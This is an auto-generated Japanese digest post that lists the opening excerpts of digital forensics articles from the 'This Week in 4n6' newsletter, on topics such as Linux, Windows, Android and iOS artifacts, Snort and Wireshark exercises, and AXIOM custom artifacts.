本エントリは This Week in 4n6 (FourAndSix=Forensics) で紹介された各記事の冒頭を表示し、チェックする記事をザッピングするために自動生成&投稿したものです。4n6 は こちら からご確認いただけます。
FORENSIC ANALYSIS
Emi Polito at Amped
Emi Polito October 3, 2023 Welcome back everyone to our series “Learn and solve it with Amped FIVE“. This week we are going to be clever and use mathematics to remove noise from an image! Don’t fret! We will learn how we can use the graphical representation of image frequency to remove noise. Curious? Read on! Contents 1 Random Noise and Periodic Noise 2 What Is the Frequency Domain? 3 Removing Periodic Noise Using the Fourier Filter 4 Automating Noise Selections in the Fourier Filter 5 Conclusi...
Amr Ashraf
16 minute read On this page OverView Linux Directory Layout the “.” files Crashes & Dumps Linux Logs Software Installation Login & User Interaction Forensics Cheat sheet Resources OverView Linux is a big target as almost every server is running some sort of Linux, In this blog post I will try to cover details as possible but also I will expect the reader to have some knowledge of using Linux, I will start with simple topics and move towards advanced ones. Some of the content in this post is copi...
DFRWS
Home Blogs APAC Unraveling Digital Mysteries: How AI Copilots can Revolutionize Digital Forensic Investigations 04 - Oct 2023Unraveling Digital Mysteries: How AI Copilots can Revolutionize Digital Forensic Investigations By Christa MillerBy Hans Henseler, Professor of Digital Forensics & E-Discovery, University of Leiden Applied Sciences, and Senior Digital Forensic Scientist at the Netherlands Forensic Institute.In hindsight, 2021 was a significant inflection point in the world of artificial ...
Digital Daniela
10/5/2023 1 Comment Hello Everyone!I did a TryHackMe room where I learned how to use Snort! Here is some cool stuff that I learned! 1. Find PID of PacketIn the task, you are asked to find the Process ID (AKA PID) of the 10th packet. I used this command snort -r snort.log.1640048004 -n 10. The PID is highlighted and is 49313. 2. Find Referrer of the 4th Packet Using the sudo snort -r snort.log.1640048004 -X -n 10 command you can find this information, scroll down until you reach the 4th packet...
Forensafe
06/10/2023 Friday When an Android deviceâs user downloads a file from the internet or receives it via emailing/messaging apps, this file is often end up to be stored by default in the Downloads folder on the device. This folder can contain a variety of file types, including documents, images, videos, audio files, and application packages (APK files). Digital Forensics Value of Android Downloads Downloads folder on an Android device can serve as a rich source of digital evidence, so examining t...
Howard Oakley at ‘The Eclectic Light Company’
[…] LikeLike 13 aONe on October 8, 2023 at 4:57 pm Reply Thanks for the reading 🙌🏻. I miss the days where I didn’t need to filter the console for it to be useful. LikeLiked by 1 person 14 hoakley on October 8, 2023 at 7:50 pm Reply Thank you. So do I. Howard. LikeLike 15 Thomas on October 8, 2023 at 9:21 pm Reply I am not sure I understand…. clearly syslog on notice level and above makes it into the new logging system. I was trying to debug pureFTP (without changing its implementation) and like ...
InfoSec Write-ups
Gowthamaraj Rajendran (@fuffsec)·FollowPublished inInfoSec Write-ups·2 min read·Nov 22, 2022--ListenShareHi Squad,Today, I will discuss the usefulness of timeline creation during Forensic analysis.Let’s get into it. (Gonna be short and to the point)Source: //i.ytimg.com/vi/5j2LOZH9_oM/maxresdefault.jpgIntroductionThe idea behind timeline analysis is to list out the events that happened in your system in chronological order. This will help you to analyze the events and their consequences.For exam...
Creating custom moduleOtt3rly·FollowPublished inInfoSec Write-ups·5 min read·Oct 1--ListenShareIn order to be successful in bug bounty you have to be a little different from the crowd — use your own or lesser-known tools. In this article, we will learn the intricacies of adding your own tool as an Axiom module.If you are interested in more about Axiom, the basics, installation, and core commands, I do recommend reading previous parts of the series.What is an Axiom module?Axiom modules are basica...
John Lukach at 4n6ir
by John Lukach It is not if but when you will need the public IP address from a Lambda execution to correlate against Cloud Trail logs during an incident so as not to end up a creek without a paddle. If the Lambda is not attached to the VPC, please at least capture the public IP address to Cloud Watch Logs using a Lambda Extension for both Container and Packaged functions, as the preparation will be well worth the extra compute costs for this ephemeral artifact. //github.com/4n6ir/getpublicip La...
Justin De Luna at ‘The DFIR Spot’
Windows Artifacts For Intrusion Analysis: A Treasure Trove of EvidenceDuring an Incident Response (IR) engagement, I'm often asked what artifacts I look at for analysis. Sure, Event Logs are fantastic, the filesystem? Yep! Awesome! Windows Registry? Fantastic! But there's also other artifacts that are extremely powerful. These are artifacts generated by the Windows OS itself. Keep in mind that these artifacts are specifically designed for forensics purposes, but we can sure as heck use them for ...
Kevin Pagano at Stark 4N6
Posted by Kevin Pagano October 04, 2023 Get link Facebook Twitter Pinterest Email Other Apps As a preface, I created a 3 part blog series on TeraCopy logs and parsing them so you may want to read those first to understand the underlying files and queries.Part 1 | Part 2 | Part 3I had a case recently where I used SQLECmd (via KAPE) to parse through a collected TeraCopy folder. The only problem is that the user must have used it often as there were over 50 history database files which when using t...
Magnet Forensics
When you’re faced with a security incident or supporting an internal investigation, quickly obtaining Remote Endpoint File Lists (a full list of all the files and folders present on an endpoint or custodian’s machine) can help you answer key questions. Specifically, “Was this file still present on the endpoint after the attack?” Or when a client or stakeholder wants to know, “How long will it take to collect and process this case?” These questions can be difficult to answer without a comprehensi...
Amber Schroader at Paraben Corporation
Written by Amber Schroader October 3, 2023 Forensic Impact We are in the time of year when our pumpkin spice cravings start crawling to the surface and we see some big releases in the world of mobile firmware. It is a good time to validate and check your tools to see what data you gained and lost with the firmware change. With Apple releasing iOS 17 we looked after the final release from the beta as well as the first patches that always go hand in hand with a release. The first change is tha...
Plainbit
현주연 2023년 10월 06일 6 분 소요 AXIOM 에서는 다양한 아티팩트 분석을 지원하지만, 간혹 분석 지원하지 않는 아티팩트가 있다.(ex. 한국에서 제작한 프로그램) 이렇게 아직 분석 기능을 제공하지 않는 아티팩트를 분석하기 위해 AXIOM 은 Custom Artifact라는 기능을 지원하고 있다.AXIOM Process에서 확인할 수 있는 커스텀 아티팩트Custom Artifact 란커스텀 아티팩트는 아직 분석 기능을 제공하지 않는 아티팩트를 분석하기 위한 기능으로 설정된 XML 파일 또는 Python 스크립트이다. 보통 XML 파일은 SQL 쿼리문을 이용해 DB 파일을 파싱한 후 가공하는 형식의 파일이며, Python 스크립트는 문서 파일(csv, txt, log, xml 등)을 파싱한 후 가공하는 형식의 파일이다.(좌) python 파일 예시 / (우) xml 파일 예시💡Custom ArtifactAXIOM Process에서 아직 분석 기능을 제공하지 않는 아티팩트를 ...
Revo4n6
Revo 4n6Revo 4n6Revo 4n6Revo 4n6Revo 4n6Revo 4n6Revo 4n6Revo 4n6HomeBlog postsDocsAbout & ContactMoreHomeBlog postsDocsAbout & ContactHomeBlog postsDocsAbout & Contact Digital forensics unveiled - blog & news Copyright © 2023 Revo4n6 - All Rights Reserved. This website uses cookies.We use cookies to analyze website traffic and optimize your website experience. By accepting our use of cookies, your data will be aggregated with all other user data.Accept
Revo 4n6Revo 4n6Revo 4n6Revo 4n6Revo 4n6Revo 4n6Revo 4n6Revo 4n6HomeBlog postsDocsAbout & ContactMoreHomeBlog postsDocsAbout & ContactHomeBlog postsDocsAbout & Contact Digital forensics unveiled - blog & news Copyright © 2023 Revo4n6 - All Rights Reserved. This website uses cookies.We use cookies to analyze website traffic and optimize your website experience. By accepting our use of cookies, your data will be aggregated with all other user data.Accept
Salim Salimov
ANALYSING PCAP FILES WITH WIRESHARK-PART 2Salim Salimov·Follow7 min read·4 days ago--ListenShareHello everybody ,Welcome to part 2 of .pcap analysing with Wireshark .Today I will try answers Quiz questions from this website :Malware-Traffic-Analysis.net - Traffic Analysis Exercises2022-03-21 -- Traffic analysis exercise - Burnincandlewww.malware-traffic-analysis.net1.I have created folder “Quiz” where I downloaded the zip file and extracted the pcap file in.Chosen the first one on the top, follo...
